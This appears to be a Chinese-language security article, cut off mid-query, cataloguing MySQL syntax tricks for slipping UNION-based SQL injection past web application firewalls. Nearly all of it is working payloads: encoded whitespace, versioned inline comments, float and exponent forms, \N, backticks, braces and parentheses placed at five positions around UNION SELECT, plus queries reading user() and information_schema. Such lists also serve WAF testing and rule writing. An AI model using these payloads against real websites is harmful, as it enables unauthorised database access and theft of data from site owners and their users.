0x01 背景

Mysql数据库特性探索，探索能够绕过WAF的数据库特性。

0x02 测试

常见有5个位置即：   SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】admin

位置一：参数和union之间的位置

(1): 常见形式%20、/**/、/*!50000union*/等形式：

SELECT * FROM admin WHERE username = 1 union select 1,user() from admin

其他形式如：%1%20、%39%20、%40%20

(2)%0a 等空白字符：

Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0；

id=1%0aunion select 1,user() from admin

%23%0a 

(3)浮点数形式 ：1.1

SELECT * FROM admin WHERE username = 1.0union select 1,user() from admin

SELECT * FROM admin WHERE username = 1.union select 1,user() from admin

其他形式如：%1%2e、%2%2e

(4)1E0的形式：

SELECT * FROM admin WHERE username = 1E0union select 1,user() from admin

(5) \Nunion的形式：

SELECT * FROM admin WHERE username = \Nunion select 1,user() from admin

位置二：union和select之间的位置

(1)空白字符

Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0；

id=1 union%a0select 1,user() from admin

%23%0a

(2)注释符

使用空白注释，MYSQL中可以利用的空白字符有：

/**/

/*anything*/

(3)括号

SELECT * FROM admin WHERE username =1 union(select 'test',(select user() from admin limit 0,1))

select * from admin union(select 'test',(select 'asd'),(select user() from users limit 0,1))

位置三：select和查询参数之间的位置

(1)空白字符

Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0；

id=1 union select%091,user() from admin

%23%0a

(2)注释符

使用空白注释，MYSQL中可以利用的空白字符有：

/**/

/*anything*/

(3)其他字符

%21  ！ 叹号

%2b  +  加号

%2d  -  减号

%40  @  电子邮件符号

%7e   ~  波浪号

SELECT * FROM admin WHERE username = 1 union select~1,user() from admin 

(4)其他方式：

括号：  SELECT * FROM admin WHERE username = 1 union select(1),user() from admin 

内联：  SELECT * FROM admin WHERE username = 1 union /*!12345select*/1,user() from admin 

@字符：SELECT * FROM admin WHERE username = 1 union select@`1`,user() from admin 

{括号：SELECT * FROM admin WHERE username = 1 union select {x 1},user() from admin 

引号： SELECT * FROM admin WHERE username = 1 union select"1",user() from admin 

\N：    SELECT * FROM admin WHERE username = 1 union select\N,user() from admin 

位置四：查询参数和from之间的位置

(1)空白字符

Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0；

id=1 union select 1,user()%09from admin

%23%0a

(2)注释符

使用空白注释，MYSQL中可以利用的空白字符有：

/**/

/*anything*/

(3)其他符号

波浪号%60： SELECT * FROM admin WHERE username = 1 union(select 1,(select `schema_name`from information_schema.SCHEMATA limit 0,1))

                   SELECT * FROM admin WHERE username = 1 union select 1,user()`from admin

内联注释： SELECT * FROM admin WHERE username = 1 union(select 1,(select/*!schema_name*/from information_schema.SCHEMATA limit 1,1))

{括号：     SELECT * FROM admin WHERE username = 1 union(select 1,(select{x schema_name}from information_schema.SCHEMATA limit 1,1))

括号：      SELECT * FROM admin WHERE username = 1 union(select 1,(select(schema_name)from information_schema.SCHEMATA limit 1,1))

双引号:     SELECT * FROM admin WHERE username = 1 union select 1,user()""from admin

括号后面加字母：SELECT * FROM admin WHERE username = 1 union select 1,user()A from admin

破浪号加字母：   SELECT * FROM admin WHERE username = 1 union select 1,user()`bfrom admin 

(4)浮点数、1E0的形式、\N形式

id=1 union%0cselect user(),2.0from admin

SELECT * FROM admin WHERE username = 1 union